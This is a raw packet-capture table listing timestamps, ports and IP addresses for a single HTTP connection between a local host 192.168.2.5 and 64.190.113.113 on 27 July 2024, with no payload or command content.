Jul 27, 2024 07:30:09.153418064 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153438091 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154150963 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154150963 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154150963 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154160023 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154181004 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154200077 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154217958 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154237032 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154254913 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154259920 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154259920 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154273987 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154293060 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154309034 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154326916 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154344082 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154360056 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154360056 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154361010 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154382944 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154402971 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154422045 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154441118 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154459000 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154881001 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154881001 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154881001 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154881001 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.154926062 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154947996 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.154989004 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.155111074 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.210386992 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.235286951 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235321999 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235342979 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235357046 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235368967 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235382080 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235435963 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.235435963 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.235532999 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235533953 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.235548019 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235560894 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235574961 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235652924 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.235652924 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.235779047 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235794067 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235806942 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235873938 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.235923052 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235938072 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235949039 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.235999107 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.235999107 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.236124992 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236139059 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236150980 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236162901 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236176968 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236186981 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236237049 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.236237049 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.236237049 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.236443996 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236458063 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236469030 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236490965 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236509085 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.236515045 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236529112 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236541033 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236553907 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236562967 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.236568928 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236581087 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236594915 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236603022 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.236603022 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.236607075 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236623049 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.236637115 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.236649990 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.237397909 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237412930 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237425089 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237437963 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237449884 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237462044 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237473965 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237484932 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237497091 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237510920 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237524033 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237536907 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237550020 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237560987 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237572908 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237586975 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.237611055 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.237611055 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.237611055 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.237611055 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.237611055 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.237611055 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.237718105 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.238303900 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238317966 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238329887 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238342047 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238353968 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238367081 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238379002 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238392115 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238404036 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238414049 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238426924 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238436937 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238449097 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238464117 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238473892 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.238514900 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.238514900 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.238514900 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.238514900 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.238514900 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.238514900 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.239160061 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239173889 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239186049 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239197969 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239208937 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239222050 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239233971 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239245892 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239259958 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239270926 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239284039 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239295006 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239301920 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239310980 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239321947 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239335060 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239346981 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.239393950 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.239393950 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.239393950 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.239393950 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.239393950 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.239393950 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.240142107 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240155935 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240165949 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240179062 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240191936 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240204096 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240215063 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240227938 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240250111 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240261078 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240273952 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240286112 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240289927 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.240289927 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.240289927 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.240289927 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.240298986 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240313053 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240314960 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.240325928 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240339994 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240351915 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.240513086 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.240513086 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.241004944 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.241020918 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.241031885 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.241044998 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.241058111 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.241070986 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.241081953 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.241094112 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.241102934 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.241102934 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.241102934 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.241102934 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.241115093 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.241167068 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.241483927 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.242861032 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.282682896 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.282814980 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.282830954 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.282844067 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.282855988 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.282866955 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.282876968 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.282880068 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.282893896 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.282901049 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.282901049 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.283165932 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.322220087 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322698116 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322711945 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322716951 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322725058 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322731018 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322737932 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.322741032 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322791100 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322802067 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322810888 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322820902 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322832108 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322840929 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322850943 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322861910 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322871923 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322881937 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322887897 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.322928905 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.322928905 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.322928905 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.322930098 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.322930098 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.322930098 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.323091984 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323102951 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323107958 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323112011 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323163986 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.323266983 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323276043 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323286057 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323362112 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323375940 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323385954 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323395967 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323405981 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323416948 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323426962 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323437929 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323447943 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323458910 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323470116 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.323496103 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.323496103 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.323496103 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.323496103 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.323496103 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.323496103 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.323574066 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.324282885 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324290991 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324300051 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324310064 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324320078 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324330091 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324340105 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324350119 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324361086 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324373007 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324383020 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324393034 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324404001 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324414968 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324424028 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324434996 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324445009 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.324455976 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.324455976 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.324455976 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.324455976 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.324455976 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.324455976 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.324511051 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.324511051 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.325370073 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325380087 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325388908 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325397968 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325407982 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325417995 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325428963 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325438976 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325449944 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325460911 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325470924 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325480938 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325489998 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325500011 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325505972 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325515032 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325525045 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.325556993 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.325556993 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.325556993 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.325556993 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.325556993 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.325556993 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.326114893 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326123953 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326133013 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326144934 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326153994 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326164007 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326174021 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326184034 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326193094 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326204062 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326287031 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.326287031 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.326287031 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.326287031 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.326776981 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326786041 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326796055 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326806068 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326817036 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326827049 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326838017 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326848030 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326858044 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326868057 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326879025 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326888084 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326898098 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326908112 CEST	80	51808	64.190.113.113	192.168.2.5
